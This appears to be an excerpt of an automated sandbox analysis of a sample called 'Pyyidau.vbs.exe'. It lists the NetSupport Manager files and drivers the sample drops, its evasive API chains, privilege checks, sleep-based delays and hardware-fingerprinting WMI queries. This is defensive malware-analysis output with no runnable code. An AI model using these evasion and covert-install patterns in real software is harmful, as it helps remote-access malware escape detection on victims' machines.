                                Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
                                Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Window / User API: threadDelayed 5788
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Window / User API: threadDelayed 3785
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI20FE.tmp
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-processthreads-l1-1-0.dll
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI1FDE.tmp
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-datetime-l1-1-0.dll
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-private-l1-1-0.dll
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\TCCTL32.DLL
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI1C29.tmp
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-runtime-l1-1-0.dll
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-utility-l1-1-0.dll
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-synch-l1-2-0.dll
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-file-l2-1-0.dll
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI1F7E.tmp
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI219F.tmp
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-filesystem-l1-1-0.dll
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI1EEF.tmp
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-math-l1-1-0.dll
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI1E8F.tmp
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\vccorlib140.dll
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIVDD.DLL
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI23F5.tmp
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\vcruntime140.dll
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\CryptPak.dll
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-processenvironment-l1-1-0.dll
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI29BD.tmp
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exe Dropped PE file which has not been started: C:\Windows\System32\drivers\nskbfltr2.sys
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\HTCTL32.DLL
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI207D.tmp
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-stdio-l1-1-0.dll
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI1ECF.tmp
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI21DF.tmp
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\concrt140.dll
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI2504.tmp
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\clhook4.dll
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-sysinfo-l1-1-0.dll
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\IsMetro.exe
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI215F.tmp
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-debug-l1-1-0.dll
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\supporttool.exe
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI1B79.tmp
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\nssres.dll
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\nspowershell.exe
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-process-l1-1-0.dll
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI201E.tmp
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-util-l1-1-0.dll
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI1AFB.tmp
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exe Dropped PE file which has not been started: C:\Windows\System32\drivers\nskbfltr.sys
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\pscrinst64.dll
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-locale-l1-1-0.dll
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\nskbfltr.sys
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\libssl-1_1.dll
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI57BD.tmp
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\x64\gdihook5.sys
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI2435.tmp
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-profile-l1-1-0.dll
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-timezone-l1-1-0.dll
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-environment-l1-1-0.dll
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI21BF.tmp
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\NSToast.exe
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\remcmdstub.exe
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-console-l1-1-0.dll
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-errorhandling-l1-1-0.dll
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\DeskDup.dll
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI20DE.tmp
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI1F4F.tmp
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIRES.dll
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-localization-l1-2-0.dll
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-interlocked-l1-1-0.dll
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI1F1F.tmp
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIMSG.DLL
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI1BC9.tmp
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI1FBE.tmp
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI2610.tmp
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIIMAGE.DLL
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\mfc140u.dll
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\pscrinst.dll
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-heap-l1-1-0.dll
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\nskbfltr2.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\msvcp140.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\DBI.EXEJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI204E.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\{CBB68368-7767-4CFF-B3E5-211488346702}\ARPPRODUCTICON.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\NSClient32UI.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI25E0.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI1BA9.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI2465.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI2B06.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI24C5.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\VolumeControlWVI.DLLJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI2E95.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIhtmlgen.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\injlib.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI213F.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI4C31.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI6914.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI2B65.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI2B95.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI2485.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI6963.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\x64\gdihook5.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI51A0.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\WdfCoInstaller01005.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI1DF0.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI291F.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcisys.sysJump to dropped file
                                Source: C:\Windows\Installer\MSI3FCC.tmpDropped PE file which has not been started: C:\Windows\SysWOW64\pcimsg.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI1E6F.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\pciconn.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\nsmres.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\nsmexec.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\nspscr.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI68D5.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI1DD0.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\mfc100.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-file-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI1C08.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI20BE.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\AudioCapture.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\VolumeControlWXP.DLLJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI209E.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI23B6.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI222E.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\libcrypto-1_1.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-file-l1-2-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI211F.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI1E3F.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\NSClientTB.exeJump to dropped file
                                Source: C:\Windows\Installer\MSI3FCC.tmp | Evaded block: after key decision
                                Source: C:\Windows\Installer\MSI264F.tmp | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess | graph_28-55151
                                Source: C:\Windows\Installer\MSI3FCC.tmp | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                                Source: C:\Windows\Installer\MSI2BE4.tmp | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                                Source: C:\Windows\Installer\MSI2BE4.tmp | Check user administrative privileges: GetTokenInformation,DecisionNodes
                                Source: C:\Windows\Installer\MSI3FCC.tmp | Check user administrative privileges: GetTokenInformation,DecisionNodes
                                Source: C:\Windows\Installer\MSI264F.tmp | Check user administrative privileges: GetTokenInformation,DecisionNodes | graph_28-55824
                                Source: C:\Windows\Installer\MSI264F.tmp | API coverage: 3.2 %
                                Source: C:\Windows\Installer\MSI2BE4.tmp | API coverage: 3.2 %
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exe | API coverage: 6.7 %
                                Source: C:\Windows\Installer\MSI3FCC.tmp | API coverage: 9.3 %
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe TID: 4080 | Thread sleep time: -19369081277395017s >= -30000s
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe TID: 4632 | Thread sleep count: 272 > 30
                                Source: C:\Windows\System32\svchost.exe TID: 1528 | Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                                Source: C:\Windows\SysWOW64\msiexec.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe | Last function: Thread delayed
                                Source: C:\Windows\System32\msiexec.exe | File Volume queried: C:\ FullSizeInformation
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe | File Volume queried: C:\ FullSizeInformation
                                Source: C:\Windows\Installer\MSI264F.tmp | Code function: 28_2_00B280C0 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,ControlService,GetLastError,GetLastError,GetLastError,QueryServiceStatus,QueryServiceStatus,Sleep,Sleep,QueryServiceStatus,wsprintfW,wsprintfW,GetComputerNameW,GetCurrentDirectoryW,wsprintfW,FindFirstFileW,GetCurrentDirectoryW,DeleteFileW,FindNextFileW,FindClose,GetCurrentDirectoryW,RemoveDirectoryW,DeleteService,GetLastError,CloseServiceHandle,OpenServiceW,GetLastError,QueryServiceConfigW,ChangeServiceConfigW,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,OpenSCManagerW,GetLastError,CloseServiceHandle
                                Source: C:\Windows\Installer\MSI264F.tmp | Code function: 28_2_00B24AF0 GetSystemDirectoryW,FindFirstFileW,FindFirstFileW,FindClose,FindClose,GetModuleFileNameW,FindFirstFileW,FindClose,CopyFileW
                                Source: C:\Windows\Installer\MSI264F.tmp | Code function: 28_2_00B10C40 FindFirstFileW,__wcsicoll,FindNextFileW,FindClose,FindFirstFileW,FindFirstFileW,__wcsicoll,FindNextFileW,FindNextFileW,FindClose
                                Source: C:\Windows\Installer\MSI264F.tmp | Code function: 28_2_00B255D0 _memset,FindFirstFileW,FindClose
                                Source: C:\Windows\Installer\MSI264F.tmp | Code function: 28_2_00B0FD80 FindFirstFileW,CompareFileTime,FindClose,__wcsicoll,CreateDirectoryW,MoveFileW,GetLastError,CopyFileW,MoveFileW,GetLastError
                                Source: C:\Windows\Installer\MSI264F.tmp | Code function: 28_2_00B0FE18 FindFirstFileW,CompareFileTime,FindClose,__wcsicoll,CreateDirectoryW,MoveFileW
                                Source: C:\Windows\Installer\MSI264F.tmp | Code function: 28_2_00B2BE60 wsprintfW,GetPrivateProfileIntW,LoadStringW,wsprintfW,wsprintfW,wsprintfW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,GetSystemDirectoryW
                                Source: C:\Windows\Installer\MSI2BE4.tmp | Code function: 30_2_004980C0 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,ControlService,GetLastError,GetLastError,GetLastError,QueryServiceStatus,QueryServiceStatus,Sleep,Sleep,QueryServiceStatus,wsprintfW,wsprintfW,GetComputerNameW,GetCurrentDirectoryW,wsprintfW,FindFirstFileW,GetCurrentDirectoryW,DeleteFileW,FindNextFileW,FindClose,GetCurrentDirectoryW,RemoveDirectoryW,DeleteService,GetLastError,CloseServiceHandle,OpenServiceW,GetLastError,QueryServiceConfigW,ChangeServiceConfigW,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,OpenSCManagerW,GetLastError,CloseServiceHandle
                                Source: C:\Windows\Installer\MSI2BE4.tmp | Code function: 30_2_00494AF0 GetSystemDirectoryW,FindFirstFileW,FindFirstFileW,FindClose,FindClose,GetModuleFileNameW,FindFirstFileW,FindClose,CopyFileW
                                Source: C:\Windows\Installer\MSI2BE4.tmp | Code function: 30_2_00480C40 FindFirstFileW,__wcsicoll,FindNextFileW,FindClose,FindFirstFileW,FindFirstFileW,__wcsicoll,FindNextFileW,FindNextFileW,FindClose
                                Source: C:\Windows\Installer\MSI2BE4.tmp | Code function: 30_2_004955D0 _memset,FindFirstFileW,FindClose
                                Source: C:\Windows\Installer\MSI2BE4.tmp | Code function: 30_2_0047FD80 FindFirstFileW,CompareFileTime,FindClose,__wcsicoll,CreateDirectoryW,MoveFileW,GetLastError,CopyFileW,MoveFileW,GetLastError
                                Source: C:\Windows\Installer\MSI2BE4.tmp | Code function: 30_2_0049BE60 wsprintfW,GetPrivateProfileIntW,LoadStringW,wsprintfW,wsprintfW,wsprintfW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,GetSystemDirectoryW
                                Source: C:\Windows\Installer\MSI2BE4.tmp | Code function: 30_2_0047FE18 FindFirstFileW,CompareFileTime,FindClose,__wcsicoll,CreateDirectoryW,MoveFileW
                                Source: C:\Windows\Installer\MSI3FCC.tmp | Code function: 32_2_001A0C40 _wcsrchr,FindFirstFileW,__wcsicoll,FindNextFileW,FindClose,FindFirstFileW,FindFirstFileW,__wcsicoll,FindNextFileW,FindNextFileW,FindClose
                                Source: C:\Windows\Installer\MSI3FCC.tmp | Code function: 32_2_001B80C0 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,ControlService,GetLastError,GetLastError,GetLastError,QueryServiceStatus,QueryServiceStatus,Sleep,Sleep,QueryServiceStatus,wsprintfW,wsprintfW,GetComputerNameW,GetCurrentDirectoryW,wsprintfW,FindFirstFileW,GetCurrentDirectoryW,DeleteFileW,FindNextFileW,FindClose,GetCurrentDirectoryW,RemoveDirectoryW,DeleteService,GetLastError,CloseServiceHandle,OpenServiceW,GetLastError,QueryServiceConfigW,ChangeServiceConfigW,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,OpenSCManagerW,GetLastError,CloseServiceHandle
                                Source: C:\Windows\Installer\MSI3FCC.tmp | Code function: 32_2_001B4AF0 GetSystemDirectoryW,FindFirstFileW,FindFirstFileW,FindClose,FindClose,GetModuleFileNameW,_wcsrchr,FindFirstFileW,FindClose,_wcsrchr,CopyFileW
                                Source: C:\Windows\Installer\MSI3FCC.tmp | Code function: 32_2_001B55D0 _memset,FindFirstFileW,FindClose,_wcsrchr
                                Source: C:\Windows\Installer\MSI3FCC.tmp | Code function: 32_2_0019FD80 FindFirstFileW,CompareFileTime,FindClose,_wcsrchr,__wcsicoll,CreateDirectoryW,MoveFileW,GetLastError,CopyFileW,MoveFileW,GetLastError
                                Source: C:\Windows\Installer\MSI3FCC.tmp | Code function: 32_2_0019FE18 FindFirstFileW,CompareFileTime,FindClose,_wcsrchr,__wcsicoll,CreateDirectoryW,MoveFileW
                                Source: C:\Windows\Installer\MSI3FCC.tmp | Code function: 32_2_001BBE60 wsprintfW,GetPrivateProfileIntW,LoadStringW,wsprintfW,wsprintfW,wsprintfW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,GetSystemDirectoryW
                                Source: C:\Windows\Installer\MSI264F.tmp | Code function: 28_2_00B1A860 _memset,GetVersionExW,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetSystemInfo,GetModuleHandleW,GetProcAddress,GetSystemMetrics,wsprintfW
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe | Thread delayed: delay time: 922337203685477
